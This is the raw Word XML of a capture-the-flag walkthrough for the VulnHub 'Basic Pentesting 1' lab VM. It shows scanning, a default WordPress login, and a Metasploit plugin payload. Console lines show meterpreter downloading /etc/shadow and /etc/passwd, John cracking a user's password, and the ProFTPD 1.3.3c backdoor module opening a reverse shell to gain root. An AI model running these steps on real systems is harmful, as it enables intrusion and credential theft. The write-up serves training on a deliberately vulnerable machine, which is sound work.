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2" w:afterAutospacing="0" w:line="17" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="0A0B0C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A0B0C"/>
          <w:spacing w:val="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>[VulnHub] Basic Pentesting 1 Walkthrough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</w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/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aps w:val="0"/>
          <w:color w:val="0A0B0C"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Difficulty level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t>: Easy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br w:type="textWrapping"/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aps w:val="0"/>
          <w:color w:val="0A0B0C"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Aim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t>: attack the VM and gain root privileges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br w:type="textWrapping"/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aps w:val="0"/>
          <w:color w:val="0A0B0C"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Author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t>: Josiah Pierce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aps w:val="0"/>
          <w:color w:val="0A0B0C"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Download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t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia" w:cs="Georgia"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline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0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.vulnhub.com/entry/basic-pentesting-1,216/"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0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia" w:cs="Georgia"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>https://www.vulnhub.com/entry/basic-pentesting-1,216/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia" w:cs="Georgia"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/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2570480"/>
            <wp:effectExtent l="0" t="0" r="4445" b="1270"/>
            <wp:docPr id="1" name="Picture 1" descr="desc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esckto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5" w:beforeAutospacing="0" w:after="84" w:afterAutospacing="0" w:line="263" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="0A0B0C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A0B0C"/>
          <w:spacing w:val="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Information Gathering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t>The first step is to find the IP address of the target machine, which can be located using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia" w:cs="Georgia"/>
          <w:i/>
          <w:iCs/>
          <w:caps w:val="0"/>
          <w:color w:val="0A0B0C"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>netdiscover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t>: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2" name="Picture 2" descr="netdis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netdiscove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aps w:val="0"/>
          <w:color w:val="0A0B0C"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Target: 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t>192.168.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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1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t>.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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>241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t xml:space="preserve">  (your target IP will likely be different)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t>We can then run a basic </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia" w:cs="Georgia"/>
          <w:i/>
          <w:iCs/>
          <w:caps w:val="0"/>
          <w:color w:val="0A0B0C"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>nmap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t> scan against the target to discover open ports and services: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3" name="Picture 3" descr="2.) Port Scanning and Version Det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.) Port Scanning and Version Detectio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t>From this we can see the following ports and services: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 w:line="336" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:hanging="360"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="3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t>port 21/tcp - FTP - (ProFTPD 1.3.3c)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 w:line="336" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:hanging="360"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="3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t>port 22/tcp - SSH - (OpenSSH 7.2p2 Ubuntu)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 w:line="336" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:hanging="360"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="3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t>port 80/tcp - HTTP - (Apache httpd 2.4.18)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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia" w:cs="Georgia"/>
          <w:i/>
          <w:iCs/>
          <w:caps w:val="0"/>
          <w:color w:val="0A0B0C"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>searchsploit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t> can be used to run a quick search against the version of ProFTP running on the target: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4" name="Picture 4" descr="searchsplo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earchsploi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t>his search reveals a backdoor RCE vulnerability in ProFTPD 1.3.3c which could be exploited easily (I'll come back to this later).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t>Instead of taking the easy route, let's first have a look at the HTTP service running on Port 80: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5" name="Picture 5" descr="its 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ts work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hint="default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hint="default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hint="default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t>We can see a default page with no useful information. Next, we will be running a gobuster scan searching for the directories.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6" name="Picture 6" descr="gob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obuste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</w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default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t>Now we can see a beautiful blog running wordpress.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7" name="Picture 7" descr="VirtualBox_kali_10_02_2021_04_26_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VirtualBox_kali_10_02_2021_04_26_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hint="default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t>Now, let’s try logging into /wp-admin. I used some random passwords, and found that admin:admin works!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8" name="Picture 8" descr="VirtualBox_kali_10_02_2021_04_31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VirtualBox_kali_10_02_2021_04_31_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t xml:space="preserve"> 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9" name="Picture 9" descr="can singin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n singin admi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vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Now that we are successfully logged in, we can upload a payload packaged as a WordPress plugin. We can use metasploit here to exploit the server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/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11" name="Picture 11" descr="msconsol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sconsol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10" name="Picture 10" descr="metasplo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etasploi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12" name="Picture 12" descr="msfconsol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sfconsole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</w:rPr>
        <w:t>We have a shell with limited permissions (www-data), so we need to find a way to escalate privileges in the machine. There are a number of ways with which we can get root.</w:t>
      </w:r>
      <w:r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84" w:afterAutospacing="0" w:line="263" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="0A0B0C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A0B0C"/>
          <w:spacing w:val="0"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>1. Root by Modifying passwd File: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If we look at the permissions of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia" w:cs="Georgia"/>
          <w:i/>
          <w:iCs/>
          <w:caps w:val="0"/>
          <w:color w:val="0A0B0C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/etc/passwd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 we can see that it is world writable!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lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="1274445"/>
            <wp:effectExtent l="0" t="0" r="6985" b="1905"/>
            <wp:docPr id="13" name="Picture 13" descr="chamgemo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mgemod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lang w:val="en-US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lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r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</w:rPr>
        <w:t>By modifying the contents of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</w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia" w:cs="Georgia"/>
          <w:i/>
          <w:iCs/>
          <w:caps w:val="0"/>
          <w:color w:val="0A0B0C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/etc/passwd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</w:rPr>
        <w:t>, we can change the password of the root user. For this we need to download the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia" w:cs="Georgia"/>
          <w:i/>
          <w:iCs/>
          <w:caps w:val="0"/>
          <w:color w:val="0A0B0C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/etc/passwd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</w:rPr>
        <w:t> file to our host machine so that we can edit it. Exit the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</w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="1224280"/>
            <wp:effectExtent l="0" t="0" r="8890" b="13970"/>
            <wp:docPr id="14" name="Picture 14" descr="ms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sf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</w:rPr>
        <w:t xml:space="preserve"> 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Next we need to create a password hash and then replace it in the passwd file. You can use any password. I’ll be using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia" w:cs="Georgia"/>
          <w:i/>
          <w:iCs/>
          <w:caps w:val="0"/>
          <w:color w:val="0A0B0C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PassworD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lang w:val="en-US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lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2667000" cy="1038225"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="15" name="Picture 15" descr="opensel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opensell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lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="textWrapping"/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lang w:val="en-US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Open the file in your favorite text editor and then replace the password for root. The entry for root should look like this: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16" name="Picture 16" descr="edit r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edit roo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lang w:val="en-US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lang w:val="en-US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Now we need to upload the file back to the target and then we can login as root, with the password we added.</w:t>
      </w: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lang w:val="en-US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lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="3418840"/>
            <wp:effectExtent l="0" t="0" r="8255" b="10160"/>
            <wp:docPr id="17" name="Picture 17" descr="Uplode fil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Uplode fil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lang w:val="en-US"/>
        </w:rPr>
      </w:pP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lang w:val="en-US"/>
        </w:rPr>
      </w:pP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lang w:val="en-US"/>
        </w:rPr>
      </w:pP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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>2. Root by Cracking Shadow Hash</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/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If we also look at the permissions of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia" w:cs="Georgia"/>
          <w:i/>
          <w:iCs/>
          <w:caps w:val="0"/>
          <w:color w:val="0A0B0C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/etc/shadow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 we can see that it is world writable!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ls -l /etc/shadow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Fonts w:ascii="monospace" w:hAnsi="monospace" w:eastAsia="monospace" w:cs="monospace"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="0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-rw-r--r-- 1 root shadow 1305 Nov 16  2017 /etc/shadow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bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline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In the Linux operating system, a shadow password file is a system file in which encryption user passwords are stored. We can crack these passwords using John the Ripper. First we need to download the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia" w:cs="Georgia"/>
          <w:i/>
          <w:iCs/>
          <w:caps w:val="0"/>
          <w:color w:val="0A0B0C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/etc/shadow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 and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia" w:cs="Georgia"/>
          <w:i/>
          <w:iCs/>
          <w:caps w:val="0"/>
          <w:color w:val="0A0B0C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/etc/passwd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 file. So exit the shell and download these files.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meterpreter &gt; download /etc/shadow .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[*] Downloading: /etc/shadow -&gt; ./shadow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[*] Downloaded 1.27 KiB of 1.27 KiB (100.0%): /etc/shadow -&gt; ./shadow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[*] download   : /etc/shadow -&gt; ./shadow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meterpreter &gt; download /etc/passwd .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[*] Downloading: /etc/passwd -&gt; ./passwd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[*] Downloaded 2.31 KiB of 2.31 KiB (100.0%): /etc/passwd -&gt; ./passwd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Fonts w:ascii="monospace" w:hAnsi="monospace" w:eastAsia="monospace" w:cs="monospace"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="0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[*] download   : /etc/passwd -&gt; ./passwd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Then we need to combine both of these files into a form john can understand and then crack the combined file.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(root💀kali)-[/home/muhannad]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 xml:space="preserve"> unshadow passwd shadow &gt; unshadowed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(root💀kali)-[/home/muhannad]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 xml:space="preserve"> john unshadowed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Using default input encoding: UTF-8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Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])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Cost 1 (iteration count) is 5000 for all loaded hashes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Will run 4 OpenMP threads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Proceeding with single, rules:Single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Press 'q' or Ctrl-C to abort, almost any other key for status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Warning: Only 5 candidates buffered for the current salt, minimum 16 needed for performance.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marlinspike      (marlinspike)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1g 0:00:00:00 DONE 1/3 33.33g/s 166.6p/s 166.6c/s 166.6C/s marlinspike..marli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Use the "--show" option to display all of the cracked passwords reliably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Fonts w:ascii="monospace" w:hAnsi="monospace" w:eastAsia="monospace" w:cs="monospace"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="0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Session completed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Hurray! we got the password for user marlinspike. Now we can login to the user by using the password </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:ascii="monospace" w:hAnsi="monospace" w:eastAsia="monospace" w:cs="monospace"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="303A3E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marlinspike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 with ssh.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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:hint="default" w:ascii="monospace" w:hAnsi="monospace" w:eastAsia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root💀kali)-[/home/muhannad]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 xml:space="preserve"> ssh marlinspike@192.168.1.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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>241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marlinspike@192.168.1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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.241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s password: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marlinspike@vtcsec:~$ id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uid=1000(marlinspike) gid=1000(marlinspike) groups=1000(marlinspike),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)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Fonts w:hint="default" w:ascii="monospace" w:hAnsi="monospace" w:eastAsia="monospace" w:cs="monospace"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="0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 xml:space="preserve">marlinspike@vtcsec:~$ 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bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US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We can see that the user is added in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia" w:cs="Georgia"/>
          <w:i/>
          <w:iCs/>
          <w:caps w:val="0"/>
          <w:color w:val="0A0B0C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sudoers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 group. Therefore we can directly run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia" w:cs="Georgia"/>
          <w:i/>
          <w:iCs/>
          <w:caps w:val="0"/>
          <w:color w:val="0A0B0C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sudo su</w:t>
      </w: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 to get the root shell.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marlinspike@vtcsec:~$ sudo su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 xml:space="preserve">[sudo] password for marlinspike: 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root@vtcsec:/home/marlinspike# id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uid=0(root) gid=0(root) groups=0(root)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Fonts w:ascii="monospace" w:hAnsi="monospace" w:eastAsia="monospace" w:cs="monospace"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="0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 xml:space="preserve">root@vtcsec:/home/marlinspike#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5" w:beforeAutospacing="0" w:after="84" w:afterAutospacing="0" w:line="263" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="0A0B0C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A0B0C"/>
          <w:spacing w:val="0"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>3. ProFTPD 1.3.3c exploit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As mentioned earlier, there is a quick and easy method of gaining access to this machine as the root user via the RCE vulnerability within the ProFTPD 1.3.3c service running on Port 21 of the target.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bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US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bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="1195070"/>
            <wp:effectExtent l="0" t="0" r="4445" b="5080"/>
            <wp:docPr id="18" name="Picture 18" descr="searchsploi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earchsploit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bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline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</w:rPr>
        <w:t>As we can see we have a metasploit payload, which will directly spawn a root shell on the target.</w:t>
      </w:r>
      <w:r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</w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts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shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br w:type="textWrapping"/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msf5 &gt; use exploit/unix/ftp/proftpd_133c_backdoor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  <w:lang w:val="en-US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msf5 exploit(unix/ftp/proftpd_133c_backdoor) &gt; set RHOST 192.168.1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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>241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  <w:lang w:val="en-US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RHOST =&gt; 192.168.1.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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>241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msf5 exploit(unix/ftp/proftpd_133c_backdoor) &gt; exploit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 xml:space="preserve">[*] Started reverse TCP double handler on 192.168.1.12:4444 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[*] 192.168.1.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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>241</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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 xml:space="preserve"> - Sending Backdoor Command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[*] Accepted the first client connection...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[*] Accepted the second client connection...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[*] Command: echo Pnp4ZfTg3sC6srJr;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[*] Writing to socket A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[*] Writing to socket B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[*] Reading from sockets...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[*] Reading from socket A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[*] A: "Trying: not found\r\nsh: 2: Connected: not found\r\nsh: 3: Escape: not found\r\n"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[*] Matching...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[*] B is input...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[*] Command shell session 2 opened (192.168.1.12:4444 -&gt; 192.168.1.7:45234)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id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uid=0(root) gid=0(root) groups=0(root),65534(nogroup)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>python3 -c 'import pty;pty.spawn("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:pBdr>
          <w:top w:val="single" w:color="000000" w:sz="6" w:space="15"/>
          <w:left w:val="single" w:color="000000" w:sz="6" w:space="15"/>
          <w:bottom w:val="single" w:color="000000" w:sz="6" w:space="15"/>
          <w:right w:val="single" w:color="000000" w:sz="6" w:space="15"/>
        </w:pBdr>
        <w:shd w:val="clear" w:fill="0E1012"/>
        <w:spacing w:before="315" w:beforeAutospacing="0" w:after="630" w:afterAutospacing="0" w:line="315" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="monospace" w:hAnsi="monospace" w:eastAsia="monospace" w:cs="monospace"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="0"/>
        </w:rPr>
      </w:pP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bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="0E1012"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t xml:space="preserve">root@vtcsec:/# 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5" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Georgia" w:hAnsi="Georgia" w:eastAsia="Georgia" w:cs="Georgia"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="303A3E"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline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B86B7C4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3B86B7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DB45EF"/>
    <w:rsid w:val="21411CCF"/>
    <w:rsid w:val="2EBB0205"/>
    <w:rsid w:val="31773891"/>
    <w:rsid w:val="3A9B5311"/>
    <w:rsid w:val="3E59184B"/>
    <w:rsid w:val="4C9D5EEA"/>
    <w:rsid w:val="67CB56D3"/>
    <w:rsid w:val="6C395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character" w:styleId="7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9">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="4"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="10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1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Office_11.2.0.9984_F1E327BC-269C-435d-A152-05C5408002CA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2021-02-15T08:23:00Z</dcterms:created>
  <dc:creator>96279</dc:creator>
  <cp:lastModifiedBy>96279</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-02-15T09:53:33Z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1033-11.2.0.9984</vt:lpwstr>
  </property>
</Properties>
</file>